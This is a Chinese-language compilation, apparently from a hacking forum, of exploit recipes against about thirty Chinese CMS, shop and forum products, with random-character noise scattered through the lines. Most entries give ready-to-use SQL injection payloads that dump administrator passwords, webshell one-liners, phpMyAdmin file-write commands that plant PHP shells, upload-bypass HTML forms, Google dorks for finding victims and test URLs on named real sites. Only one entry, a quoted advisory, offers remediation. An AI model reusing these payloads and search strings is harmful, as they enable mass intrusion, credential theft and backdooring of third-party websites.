启航企业建站系统 cookie注入漏洞通杀所有版本6 [3 p5 _2 Q, f! {9 m( f& i$ |( s
+ o# h$ I: y3 N( C% Z
直接上exploit:
7 ?& W u1 l" ]javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
0 P) M& X+ h8 Dtest:http://www.tb11.net/system/xitong/shownews.asp?id=2103 F4 v8 b5 z8 X% x& I2 P2 k9 K
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 x8 m/ f" G* B5 g* Z7 uAsprain论坛 注册用户 上传图片就可拿到webshell
+ K( ~# @' ?7 p' U* o9 @* c. D4 [! e! O1 f) y
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。" ~3 z- L6 P3 {% u/ ^
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
& M* i3 o4 ]3 J! F. u( f2 ?2.gif 为一小图片文件,一定要小,比如qq表情图片( @5 i; k5 [: a7 k
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用( }2 d% i4 P% o
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
) B9 L8 S% G! a& j1 @ p7 x8 X3 ^5.q.asp;.gif$ r4 u7 b5 g \
google:Powered by Asprain
" U% ^, C3 j* i8 x6 H& a2 c--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 c5 h# |2 I' I9 w! F% z( [* I' {' ]- O
ShopNum1全部系统存在上传漏洞。2 }% S6 L( [+ J }' G2 d! W
4 [2 i' R: S: A. B7 j* ^: _首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
% S" i6 b1 T. |- y3 ?1 y按说明 提示登录后台。。2 y( l9 p! }5 n. Z
在后台功能页面->附件管理->附件列表
7 W/ h: ^9 U. M" z; F可以直接上传.aspx 后缀木马7 \6 B! F' @+ e, m4 o a) r
http://demo.shopnum1.com/upload/20110720083822500.aspx# r/ s+ Q5 Y& r6 Z; \( ?
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# f5 {5 K+ w( h2 Y5 ?% U
5 Z) }/ C. A& _6 Z$ ]/ S6 j
牛牛CMS中小企业网站管理系统 上传漏洞/ i& e( |2 V* n. C% z( e0 O
7 z: E- K4 C V+ `2 k
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
2 h X! y5 j/ S& b2 s3 j# y; {后台:admin/login.asp
& Y( X* M% ^! X6 r$ Gewebeditor 5.5 Nday! j% P% h, E+ p4 ~& v, ?1 T/ P
exp:$ r& H& n/ _5 C" E) [9 _
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?* E' L ~3 q% o* _- ?+ B1 t
<input?type=file?name=uploadfile?size=100><br><br>?* P1 P2 A. k* ?& R! p3 E
<input?type=submit?value=upload>?
. q6 V' Z0 \3 {/ B</form>, O0 ^5 o& N5 d
ps:先上传小马.+ j7 v; T5 v$ W2 a5 Y b
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
8 j; x1 l0 t2 t+ G: N8 d
3 I4 E6 @' R( G- B# R7 e6 _( b--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ A! {. z; w. p! n; k) \3 _" E+ J/ j" r9 H6 i7 y4 O# w
YothCMS 遍历目录漏洞
* n- {* O% f" w* Y
6 X' P& [- D) {' F- G优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。+ c7 I m' Q7 b! P) P1 Q' o$ E' a
默认后台:admin/login.asp
- G7 [$ Y- O' N7 B遍历目录:
1 g5 G/ `9 L. s* I$ P$ b: ^ewebeditor/manage/upload.asp?id=1&dir=../
6 X2 `* y& ?: z+ T# Ndata:& Q& ?' C* y% O: |
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa* a. m: ~5 H+ z5 r% l$ O0 ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 ~" x5 S6 [% A! |. y. Z' L+ O
3 V. Q+ \2 z) t; h, \Net112企业建站系统 1.0
+ t$ I* L( Q) S. Z, q' b |! a' D9 Z# X
源码简介:2 U) ]3 d9 a( k. U0 a2 P7 W2 p3 o
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。9 v, ^5 h1 C0 Y5 V1 V J1 c
添加管理员:
* O7 j% F% j3 I; dhttp://www.0855.tv/admin/admin.asp?action=add&level=2
) j2 a( H8 q3 ]) H% j3 g+ j u# X其实加不加都不是很重要,后台文件都没怎么作验证。
, q0 B0 p5 N% G& h% s- h3 K上传路径:/ l. B- z' O" {8 [" c( x5 n
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200& o' u" }# i0 P2 Y% c
http://www.0855.tv/inc/Upfile.asp?Stype=26 {. K) T+ z y0 g3 d2 A; c
怎么利用自己研究。
' u/ g+ u# l8 k' r7 i遍历目录:
4 c1 R/ S; {( h9 x' Phttp://www.0855.tv/admin/upfile.asp?path=../.. k- `6 M! A, `1 x
如:
1 G- [0 K H# Nhttp://www.0855.tv/admin/upfile.asp?path=../admin
5 q) N4 k# @2 |5 G, i3 O' ~) _http://www.0855.tv/admin/upfile.asp?path=../data3 ~( M( `5 X' \/ m& Q: h9 R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' A+ i/ N8 V0 R% [6 s) V3 I
# O% M' M' x" ^9 R, z d: k4 T易和阳光购物商城通杀 上传漏洞
O5 E- ~5 g: j2 K" l4 N. {
& }( G" m- o* p" Y1 `1 _% ~2 }前提要求是IIS6.0+asp坏境。. @8 K) v" ~8 j4 ^/ ~) A7 h5 |
漏洞文件Iheeo_upfile.asp - z$ Q; ?3 e5 c3 N, O: D
过滤不严.直接可以iis6.0上传
8 ^2 _+ a* a, Q( C! v把ASP木马改成0855.asp;1.gif0 V" v, y" d" Z! B, a5 j, y7 h
直接放到明小子上传
& x/ ^, `7 c* z+ w6 a' T2 c/ vGoogle搜索:inurl:product.asp?Iheeoid=
5 r! z* `4 P3 A$ e& p* n6 _--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ T% a& j7 J2 V4 J! S; [8 ]6 p) U+ h. @$ L+ q v e
phpmyadmin后台4种拿shell方法
: Y& w1 g8 o. m5 ]) K' _
3 z2 n1 @/ Q5 d( T方法一:
: v: G6 S' M7 n( P* v% d: t& BCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
8 O# Y* ~& W$ N0 r. T5 `INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');2 f. y3 X! M, e/ K1 l% x5 S: i
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
: v6 Y# U* c3 |; Y5 V9 I----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
9 X# m1 U9 i! v/ R- @' j* u一句话连接密码:xiaoma
* A: a c# z7 M方法二:
. c d" B8 G1 _. S3 d8 ?4 l) L, n; iCreate TABLE xiaoma (xiaoma1 text NOT NULL);" T+ o( v: W* ^/ \& M( L
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
, q$ r3 Y1 T8 q* j# ~4 x) |select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';1 D9 C/ C. D: G) J8 Z" D
Drop TABLE IF EXISTS xiaoma;
\( B% P j5 D& H5 J `- F! t方法三:
' d- b: H$ J: [8 o! O4 [% u2 R+ a读取文件内容: select load_file('E:/xamp/www/s.php');
0 z- l2 R8 V& \, p" q* h, o1 n写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
& ~7 q2 R6 b- |& Qcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'3 J1 f, F& w3 c8 n
方法四:6 z o$ p' B" b" n- l
select load_file('E:/xamp/www/xiaoma.php');$ S7 H+ e4 v9 H+ {4 X# N2 b
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'' H( v6 f! w) a8 k: c
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
0 j9 h4 v+ F) ^; {# s--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) c+ s4 S2 k7 G, Q% v- u3 u, l9 U8 G2 G }. b+ V6 c4 i
传信网络独立开发网站源码0day漏洞
0 n2 i% B; n( Y7 O+ w6 V$ ~. |
& [4 N7 |; f% B( v! c3 z. ?) U后台system/login.asp _! o3 l" @" c6 F- p
进了后台有个ewebeditor
' d9 A ~5 W, v4 [) w/ Q ~Google 搜索inurl:product1.asp?tyc=4 |6 B1 b5 B, u. i
编辑器漏洞默认后台ubbcode/admin_login.asp
2 k6 |3 _( c) y, e/ H9 x数据库ubbcode/db/ewebeditor.mdb
' A% E: h# z% b9 m2 n' c3 y默认账号密码yzm 111111
4 b" s6 A: \2 {6 `6 O% A! F( {1 b$ \' `! p
拿webshell方法
4 }( G6 P8 U/ J$ F1 X8 c登陆后台点击“样式管理”-选择新增样式
! t$ ^5 g2 { s8 n1 i样式名称:scriptkiddies 随便写
/ y7 E: y8 V' B* a路径模式:选择绝对路径
" J9 k+ t0 I a# ^" }图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx P5 G7 g4 |0 w3 u8 F
图片类型比如就是我们要上传的ASP木马格式
8 _5 K3 u1 y' U- r+ m2 x上传路径:/" U6 ~. P" _3 x5 o: c m
图片限制:写上1000 免的上不了我们的asp木马
$ L8 U$ B* o/ m" [$ n上传内容不要写
* I" R/ @8 {8 i2 m' u* Z) C6 E可以提交了 ; L2 w2 m5 n0 ?" F5 n
样式增加成功! % C2 j0 `# d+ o2 ?9 D
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
5 f ^' q, q# h6 x+ Y6 ^2 S! K3 x按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置. V$ l- M. ^7 ]6 t
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies) g Z. i! L; F! ?% g5 n8 T
上ASP木马 回车 等到路径9 Z- t4 X, g5 U1 G$ A8 x8 h
! D3 M- A! Q* X' E& v2 q0 D
后台:system/login.asp
% E! O4 ]0 I$ b {! K/ U3 lExp:6 P1 E) h d1 Q i& i% m8 e
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
" g6 j6 h$ O# {测试:
+ @8 ^8 Q, m& l, a" }" p0 d4 ^http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master3 Y2 l/ v3 Y* @, p0 ^; o
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
7 N# m" i8 f2 G v$ ^7 n: D" [) O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 }2 E% C6 U# \/ j
Y" B: q1 B8 C5 b8 z; `* e6 gfoosun 0day 最新注入漏洞
3 }) p2 m& A& o+ h4 L
. k1 \' @3 ^* \% `* P6 E& X漏洞文件:www.xxx.com/user/SetNextOptions.asp8 ]* s5 Y# i7 x f9 h/ M
利用简单的方法:/ w0 @- P; R0 P1 d H2 [
暴管理员帐号:1 w) f3 K7 y5 @1 k/ e( P& Y0 A
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin# C! y5 c1 }0 Y+ W' g# a, y
暴管理员密码:
6 ?" ?, ~, Z0 A; Hhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,1 m, `4 V. Q/ b B5 B- B
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. T5 B( p* y/ O' e% B
. F( X6 b2 w3 T+ i1 r( b
网站程序的版权未知!
" G4 O P. q* U' B
5 A, O% b4 ^; M) `! O默认网站数据库:1 z3 l, g5 P8 B
www.i0day.com/data/nxnews.mdb
+ }2 |5 K1 m* @& L2 Gewebeditor 在线编辑器:
: y( Q0 A5 n; j3 R1 H编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb4 Y5 I1 F- @6 r; u$ U* y
登录地址:ewebeditor/admin_login.asp
7 v: S* V) J. {* z) D默认密码:admin admin
; R2 j6 C3 k$ r9 ]2 f登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
0 `8 @7 }- @2 K" J; L; E" h( v H% b3 i0 n, d
Sql注入漏洞:& m+ w* D. C% O
http://www.i0day.com/detail.asp?id=12
) z0 B* Y. w' G$ ~% lexp:0 u& Z1 _, h+ { ~. K# T! a6 ]
union select 1,admin,password,4,5,6,7,8 from admin
1 U0 g% N8 C9 J+ `) w V爆出明文帐号/密码
6 Z$ ^+ y+ j+ w a& e
) c: u6 ] h) z4 W! h上传漏洞:
; q4 B3 Y7 R% g! x; [后台+upfile.asp+ S; z0 i7 y& G5 X4 W
如:2 g0 h/ A& k y+ N2 ]- \
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。5 ]+ m3 V9 a! ^; O
shell的地址:网址+后台+成功上传的马
' O3 P! y4 g0 B2 ?! Sgoogle:inurl:news.asp?lanmuName=
$ \0 |6 G+ Z j U------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! l: A7 b( Y% n( |3 m3 o
( Q. i0 O& z% B2 D! Z, f+ R* `8 @dedecms最新0day利用不进后台直接拿WEBSHELL
! V' s) O2 Y- V# P1 o+ _7 W9 m& [2 s2 W5 @# t" c
拿webshell的方法如下:- b; y' L8 S- m4 h5 A1 F7 m
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.( `) r- t8 _# H% v0 l
前题条件,必须准备好自己的dede数据库,然后插入数据:
9 _ f" W) g' I. Y3 Tinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
$ G* P1 p" ~ d7 D1 \" ]/ E3 ~1 Z2 M6 U3 e' G/ l
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
+ B! B- o2 p$ r+ @7 f+ N) J$ Z2 V<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
" @; r# E% L$ V2 n8 j) N<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
. W7 W( }- K% v: D. F0 C<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />* c7 |8 x( W9 H
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />1 [5 s. ]( q9 h
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
! D! p$ W% _ c3 ~ v0 ?% O. X, g" Z<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />3 d7 x g: [8 S. m6 k6 w0 N6 d5 O
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />2 j2 j5 e) U- q* @8 E* |# y
<input type="text" value="true" name="nocache" style="width:400">/ F& C9 g! R- s4 O0 w0 S) h
<input type="submit" value="提交" name="QuickSearchBtn"><br />0 a, f; G, v: z
</form>8 U7 F. I6 i. {( i$ q: M
<script>' v7 _; m% t _+ `& `
function addaction()
, v4 G5 `% F: b. P% ?( y) n{( W' O9 C. O c" r3 ?
document.QuickSearch.action=document.QuickSearch.doaction.value;+ w* F5 r+ I) X7 T
}
: N) S' ?5 h( G' A</script>$ A1 N% E) V4 ~2 f
-----------------------------------------------------------------------------------------------------------------------------------------------
) s' n; ~+ H9 G+ M, N% |6 x
4 _0 K' D! s: u" p8 c3 ?, `dedecms织梦暴最新严重0day漏洞2 Y+ r! k& @1 x j- k( b
bug被利用步骤如下:
4 E7 s' s5 W/ U1 j8 W' p* Ihttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root; z6 i8 o' j$ A1 t
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
! h# n+ [& }& y+ A-------------------------------------------------------------------------------------------------------------------------------------------
/ o, j8 I4 {' `! L4 B3 e) T6 e' b; X' }; g5 A/ j) l
多多淘宝客程序上传漏洞 ( S, a3 n) `$ D
漏洞页面:
5 n% @' Y0 d" ~ {/ V- j- Kadmin\upload_pic.php8 y) n3 z' y) Z% o, n, o) Z
传送门:' K1 M& J& | T3 l5 K- _$ @# }
http://www.www.com/admin/upload_pic.php?uploadtext=slide1# L0 `/ b* d* Q. ^; T
PS:copy张图片马 直接 xxx.php 上传抓包地址!
d: j2 A; e& E8 w; h" o- }------------------------------------------------------------------------------------------------------------------------------------------------------
9 S4 _7 W7 \. P! C5 O( M
4 m; b" {) V8 I8 {# U" l# o( D无忧公司系统ASP专业版后台上传漏洞
. ]( a9 \3 o$ E漏洞文件 后台上传
2 @5 _9 x( J7 @6 c& Xadmin/uploadPic.asp
. N) E% `2 p; F6 T7 I" o漏洞利用 这个漏洞好像是雷池的4 r- Q1 v) Y2 E0 [2 A
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=14 |/ R( g8 ~* P. r; [8 _
等到的webshell路径:, [9 m+ v8 o* [, _
/UploadFiles/scriptkiddies.asp;_2.gif
: G/ X& w3 T9 l; |--------------------------------------------------------------------------------------------------------------------------------------------------- i5 q/ I, J. o e# A8 e( Q
3 c- {+ F8 L. b) @& W n
住哪酒店分销联盟系统2010
( S9 }# H& W# y# F% O. gSearch:& u5 Z X9 @+ k+ G, m
inurl:index.php?m=hotelinfo
- z$ o: n& C* F4 `$ Khttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
+ P2 R& D, k) @2 C默认后台:index.php?m=admin/login% Y! x2 l* _. w+ W( m: E/ c
--------------------------------------------------------------------------------------------------------------------------------------------------
/ @1 R/ b+ v5 B2 b- K# j3 c
w6 G0 K. K9 I# U* p) [inurl:info_Print.asp?ArticleID=
7 A9 }' ^, K. m; e/ E9 l d' ]后台 ad_login.asp3 d# r6 i* k+ g7 h
爆管理员密码:
$ D# n% B3 A* ?( j* m, ?union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin) i6 U! b/ h/ o& }9 N
------------------------------------------------------------------------------------------------------------------------------------------------------------
# ?: k7 [8 |0 ^' w
{; {' J. K2 I( K- N3 C搜索框漏洞!
8 }) a4 U" C$ L* ]. D) Y%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
/ N: m U3 Z# [* g* q3 I--------------------------------------------------------------------------------------------------------------------------------------------------------* Z/ Q" ~$ q1 \1 Q; o; G* K
2 \3 H* w4 Y0 g" L' {7 m- T% K关键字:
. _! @) }0 Z8 }inurl:/reg_TemletSel.asp?step=2
2 l! x% M _* a2 @3 f或者
, u- Z. v" o) B- w: Y8 O电子商务自助建站--您理想的助手 ^0 y# q H2 e) ?, e$ c( H; ?
-------------------------------------------------------------------------------------------------------------------------------------------------+ G! K8 T) B8 w& M4 U. F
5 \8 p; X" K9 P
iGiveTest 2.1.0注入漏洞
, z! H7 X' g: E5 c, H' l; \9 i& Q u9 gVersion: <= 2.1.01 u5 C' M" K: m+ c' t
# Homepage: http://iGiveTest.com/
( }6 a% u- P" E6 \6 \谷歌关键字: “Powered by iGiveTest”
9 x& ]8 K$ P' [7 {( S随便注册一个帐号。然后暴管理员帐号和密码
( A& P; Z* N; p9 xhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
/ y" n* O7 \" ^1 n }+ K- v------------------------------------------------------------------------------------------------------------------------------------------------
$ N4 W0 B0 T, r, v( | {
' y7 |2 W3 E, M" X9 R2 eCKXP网上书店注入漏洞
9 h) j1 H" k! z工具加表:shop_admin 加字段:admin
) E" U+ S1 ~( o5 v后台:admin/login.asp . X5 M) q& | T
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
* j* ^9 v4 e8 u# I6 L Binurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
5 b' G9 X3 \" G$ o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ Y0 w8 i% F/ z4 P
! `# L, s; t, B: s; t: D$ U! G段富超个人网站系统留言本写马漏洞% ~9 L. b& A; `) Q
源码下载:http://www.mycodes.net/24/2149.htm" K; t3 r" p1 q
addgbook.asp 提交一句话。
0 q* C; T: s: o% |. T% j6 F连接: http://www.xxxx.tv/date/date3f.asp g m3 m$ ^% V5 N3 D
google:为防批量,特略!+ L( E8 r+ z: y
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ u- M( [0 g- H, I$ |5 v
3 Z) F: ^8 i0 b" ?智有道专业旅游系统v1.0 注入及列目录漏洞
2 X: _7 B5 w8 j$ P# T7 e: g默认后台路径:/admin/login.asp% h x+ u* d! ?5 |
默认管理员:admin
/ E; a+ _1 n0 ~3 K默认密码:123456
8 a6 j: s! [8 n$ g, `4 c4 C$ OSQL EXP Tset:+ z0 U% i+ V6 y }7 y
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin0 `, I6 S. X& T2 T5 z8 x# I
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 B r0 `' }2 r" V& j: T. g3 c% G
9 U( j2 K' J& b4 ]9 O9 U5 qewebeditor(PHP) Ver 3.8 本任意文件上传0day
% U- _% C- B3 C% o) ^$ XEXP:# L5 Z6 b6 t. L6 U$ O5 {) M' v
<title>eWebeditoR3.8 for php任意文件上EXP</title>$ @& x/ w7 Q/ e2 K# z. O3 g* h: l
<form action="" method=post enctype="multip; Z. X6 ^& z% Q( H1 N% P* g5 ?
art/form-data">
$ `. j5 `' I; @. T, z<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> " b7 \( G$ V2 W1 l% o2 k; D
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> / b, n1 K# w. P0 M" m6 @' n$ \4 H$ _; M
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
/ ?9 |1 r! X/ l, jfile:<input type=file name="uploadfile"><br> 6 v" r9 b1 Q8 w" r
<input type=button value=submit onclick=fsubmit()> " P$ P5 Y: c- F/ f! e! A+ k
</form><br> ) o1 y- z. _3 M% r- W/ O! B$ o A
<script> # X! B4 I, N5 \6 g: v- M* M6 S
function fsubmit(){
* Z5 X/ I) h( f V+ t* ^form = document.forms[0]; 3 i$ W$ @9 g7 G+ W* u
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; + ?) Y `8 E% b( ^. G; A6 I* G
alert(form.action);
- \4 j) t# W- B- C! d2 Z# i; \form.submit(); / Y; n9 @5 L, {$ W* e9 I5 j
} . ~* o! ]. S9 v$ N) F
</script>0 ^1 z* W; k; H* C) e8 o3 M- ^
注意修改里面ewebeditor的名称还有路径。
4 Y! G* w, Q3 w1 ?* T% {6 j2 ^---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' U' G( ^6 a% _* k: s T% I& G2 J+ B, j7 D
提交’时提示ip被记录 防注入系统的利用
- o5 R) b* L- V6 j网址:http://www.xxx.com/newslist.asp?id=122′
+ o) X" l: h5 n0 x1 U提示“你的操作已被记录!”等信息。
: c& _5 s% J) Q$ R, V6 }" Z利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
# e& ]! h1 P/ k- Z& @3 r-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! b9 y) ]2 S; J, U {, V! X- q
|9 Z6 @# A* b5 v) c: f& Q9 D西部商务网站管理系统 批量拿shell-0day& I) @) y$ [4 P" R' k" O' ]
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 0 [, p# b9 c$ F E4 t6 L
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛4 c! x/ z8 l$ S) \) y
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合2 T6 _9 z- M1 O3 z
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂+ R2 {3 l. Y* E. L- o# `7 S
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- t. c" q( |% A2 a/ s% ?0 ]8 f1 g3 b! f. J" c& t3 W
JspRun!6.0 论坛管理后台注入漏洞8 p* O* @% m3 M
4 q+ K! |: T: r8 p l2 @
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:8 E2 A, I+ @+ ^- ^9 d/ }- R2 @+ L q
JspRun!6.0 " n$ q) i; B9 E& E9 {) p L% T
漏洞描述:
7 [1 M& \) a) A/ J& xJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。+ l9 Z; j" |+ t9 t- {
在处理后台提交的文件中ForumManageAction.java第1940行0 A1 p& e! f" q2 a8 r
String export = request.getParameter("export");//直接获取,没有安全过滤
6 k7 Q8 ?# y7 e0 \6 `if(export!=null){
1 \' ?. |" v- WList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...& Y8 l" b& y; {/ E* [' u* A
if(styles==null||styles.size()==0){
0 w( n8 A* P- a, y7 z7 c2 z<*参考
7 ~8 }3 }! r$ x& S$ tnuanfan@gmail.com3 m, F- c" W7 H& H$ p& i- \
*> SEBUG安全建议:# e+ C7 Y6 S6 ~" W
www.jsprun.net4 G6 R9 _ L8 g$ ?/ u+ r* D
(1)安全过滤变量export
* u9 F. r1 k, V* F- Q M(2)在查询语句中使用占位符0 U, D `- ]9 }) n
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 o, \% |0 ~) T8 ]6 g
+ e" L0 T$ v& M& c乌邦图企业网站系统 cookies 注入+ E$ q+ |4 ~& |, [3 }/ `
/ v3 `2 }, A, H9 l. J( s& Q& x0 P0 n; t6 @程序完整登陆后台:/admin/login.asp
# R2 I# d" Z+ R0 c默认登陆帐号:admin 密码:admin888: I9 O2 {/ M6 d6 c: i; L
语句:(前面加个空格)1 B2 c- L' [+ S& H
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin. k! T; ?! g! B
或者是16个字段:* r% Q$ E9 `9 |7 |
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin3 d. [5 v2 q! K- ~
爆不出来自己猜字段。6 Z7 E$ i: G$ P m3 M
注入点:http://www.untnt.com/shownews.asp?=88' y& q/ w* u; q) C8 D2 w" F
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
9 I% K' B9 T4 c# J关键字:
$ E ]& |& q* Hinurl:shownews?asp.id=3 s9 v1 N/ i% n, h$ E3 Q* V
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* m/ V3 j% G6 A( d' V7 O* n
, \: p2 t7 P2 |* @ m4 s# OCKXP网上书店注入漏洞
( i5 c0 K3 F) p4 Q- B
- r t) Z: j. T9 E2 p工具加表:shop_admin 加字段:admin1 L& m% W; g# s- |1 y" B
后台:admin/login.asp 6 l( k! _0 o6 i
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/! p6 B5 N1 q' u5 A
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息" J* e2 }. g0 h) `
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# w6 q( X0 ]+ `) ^
" e' k' |- h* w. Y7 }8 ^2 \$ VYxShop易想购物商城4.7.1版本任意文件上传漏洞 b# ^$ s4 g# H+ N
- \- e# C4 c& W3 q, t5 B2 F7 n, ohttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
